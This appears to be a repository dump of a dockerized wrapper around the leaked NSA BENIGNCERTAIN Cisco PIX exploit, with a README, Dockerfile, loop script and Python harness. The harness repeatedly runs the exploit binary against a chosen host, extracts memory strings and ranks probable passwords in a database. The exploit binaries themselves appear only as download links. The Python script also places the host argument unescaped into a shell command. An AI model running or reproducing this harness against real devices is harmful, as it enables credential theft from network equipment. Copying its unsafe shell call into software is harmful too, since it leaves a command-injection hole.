├── Dockerfile
├── README.md
├── benigncertain
    ├── 3DES_MD5_payload
    ├── 3DES_SHA_payload
    ├── AES_MD5_payload
    ├── AES_SHA_payload
    ├── DES_MD5_payload
    ├── DES_SHA_payload
    ├── bc-genpkt
    ├── bc-id
    ├── bc-parser
    └── sendpacket.raw
├── entry.sh
├── poc.py
└── requirements.txt


/Dockerfile:
--------------------------------------------------------------------------------
1 | FROM python:3.7
2 | RUN mkdir /exploit
3 | WORKDIR /exploit
4 | COPY . /exploit/
5 | RUN pip install -r requirements.txt
6 | RUN chmod -v +x /exploit/entry.sh
7 | ENTRYPOINT ["/bin/bash", "./entry.sh"]
8 | 


--------------------------------------------------------------------------------
/README.md:
--------------------------------------------------------------------------------
 1 | # Quickstart
 2 | ```
 3 | $ git clone https://github.com/VirtueSecurity/benigncertain-monitor.git
 4 | $ cd benigncertain-monitor
 5 | $ sudo docker build . -t benign-monitor
 6 | $ sudo docker run -it benign-monitor <host>
 7 | ```
 8 | The service will continuously poll the vulnerable pix, extract ascii strinsg from memory, store the strings in a local sqlite datebase, and show the most frequently observed strings:
 9 | 
10 | ```
11 | Starting monitor against 10.0.6.1
12 |         string  count
13 | 0         5$dx      3
14 | 1          0(0      3
15 | 2         $c{l      3
16 | 3       (0"t&j      3
17 | 4   R$dkd$hf7!      2
18 | 5    %d1N=8$i-      2
19 | 6        $c)P0      1
20 | 7         1NlD      1
21 | 8        1NlD'      1
22 | 9       $c)P(0      1
23 | 10     $c)P1@_      1
24 | ```
25 | 
26 | # Overview
27 | This dockerized python script is a wrapper for the NSA BENIGNCERTAIN Cisco exploit. This script polls the vulnerable service over time to identify probable passwords and other potentially sensitive information. Since the NSA exploit previously only revealed a point in time status, we built this as a service to show impact over broader period of time.
28 | 
29 | # Credit
30 | 
31 | This service is an opensource component of our service-backed pentesting platform [PurpleLeaf](https://purpleleaf.io)
32 | 
33 | 


--------------------------------------------------------------------------------
/benigncertain/3DES_MD5_payload:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/VirtueSecurity/benigncertain-monitor/a7acc3254b1fb906f6b31a158ecd9ec6b08981e7/benigncertain/3DES_MD5_payload


--------------------------------------------------------------------------------
/benigncertain/3DES_SHA_payload:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/VirtueSecurity/benigncertain-monitor/a7acc3254b1fb906f6b31a158ecd9ec6b08981e7/benigncertain/3DES_SHA_payload


--------------------------------------------------------------------------------
/benigncertain/AES_MD5_payload:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/VirtueSecurity/benigncertain-monitor/a7acc3254b1fb906f6b31a158ecd9ec6b08981e7/benigncertain/AES_MD5_payload


--------------------------------------------------------------------------------
/benigncertain/AES_SHA_payload:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/VirtueSecurity/benigncertain-monitor/a7acc3254b1fb906f6b31a158ecd9ec6b08981e7/benigncertain/AES_SHA_payload


--------------------------------------------------------------------------------
/benigncertain/DES_MD5_payload:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/VirtueSecurity/benigncertain-monitor/a7acc3254b1fb906f6b31a158ecd9ec6b08981e7/benigncertain/DES_MD5_payload


--------------------------------------------------------------------------------
/benigncertain/DES_SHA_payload:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/VirtueSecurity/benigncertain-monitor/a7acc3254b1fb906f6b31a158ecd9ec6b08981e7/benigncertain/DES_SHA_payload


--------------------------------------------------------------------------------
/benigncertain/bc-genpkt:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/VirtueSecurity/benigncertain-monitor/a7acc3254b1fb906f6b31a158ecd9ec6b08981e7/benigncertain/bc-genpkt


--------------------------------------------------------------------------------
/benigncertain/bc-id:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/VirtueSecurity/benigncertain-monitor/a7acc3254b1fb906f6b31a158ecd9ec6b08981e7/benigncertain/bc-id


--------------------------------------------------------------------------------
/benigncertain/bc-parser:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/VirtueSecurity/benigncertain-monitor/a7acc3254b1fb906f6b31a158ecd9ec6b08981e7/benigncertain/bc-parser


--------------------------------------------------------------------------------
/benigncertain/sendpacket.raw:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/VirtueSecurity/benigncertain-monitor/a7acc3254b1fb906f6b31a158ecd9ec6b08981e7/benigncertain/sendpacket.raw


--------------------------------------------------------------------------------
/entry.sh:
--------------------------------------------------------------------------------
 1 | #!/bin/bash
 2 | 
 3 | if [ -z "$1" ]; then
 4 |  echo "host parameter needed"
 5 |  exit
 6 | fi
 7 | 
 8 | 
 9 | while :
10 | do
11 |  echo "Starting monitor against $1"
12 |  python3 poc.py $1
13 | 
14 |  sleep 20
15 | done
16 | 
17 | 


--------------------------------------------------------------------------------
/poc.py:
--------------------------------------------------------------------------------
 1 | import sqlite3
 2 | import os
 3 | import subprocess
 4 | import pathlib
 5 | import pandas as pd
 6 | import sys
 7 | import time
 8 | 
 9 | conn = sqlite3.connect('details.db')
10 | c = conn.cursor()
11 | c.execute("CREATE TABLE if not exists result(string text , count integer)")
12 | conn.commit()
13 | 
14 | host = sys.argv[1]
15 | 
16 | path = 'benigncertain'
17 | file = pathlib.Path(f'{path}/{host}.raw')
18 | 
19 | try:
20 |     cp = subprocess.run([f"timeout 10s ./bc-id -t {host}"], cwd=path, universal_newlines=True, shell=True,
21 |                         stdout=subprocess.PIPE,
22 |                         stderr=subprocess.STDOUT)
23 | 
24 |     output = subprocess.run([f"strings {host}.raw"], cwd=path, universal_newlines=True, shell=True,
25 |                             stdout=subprocess.PIPE,
26 |                             stderr=subprocess.STDOUT)
27 |     words = output.stdout.split()
28 | 
29 |     if words and file.exists():
30 |         for word in words:
31 |             c.execute("SELECT count FROM result WHERE string=?", (word,))
32 |             query = c.fetchone()
33 |             if query is None:
34 |                 c.execute("INSERT INTO result(string, count) VALUES(?,?)", (word, 1))
35 |             else:
36 |                 c.execute("UPDATE result SET count =? WHERE string=?", (query[0] + 1, word,))
37 | 
38 |         conn.commit()
39 |         os.remove(f'{path}/{host}.raw')
40 | 
41 |         print(pd.read_sql_query("SELECT * FROM result order by count DESC", conn))
42 | 
43 | except subprocess.TimeoutExpired:
44 |     print('\'bc-id\' binary timed out, this will happen frequently with some hosts.' )
45 | 
46 | 


--------------------------------------------------------------------------------
/requirements.txt:
--------------------------------------------------------------------------------
1 | pandas


--------------------------------------------------------------------------------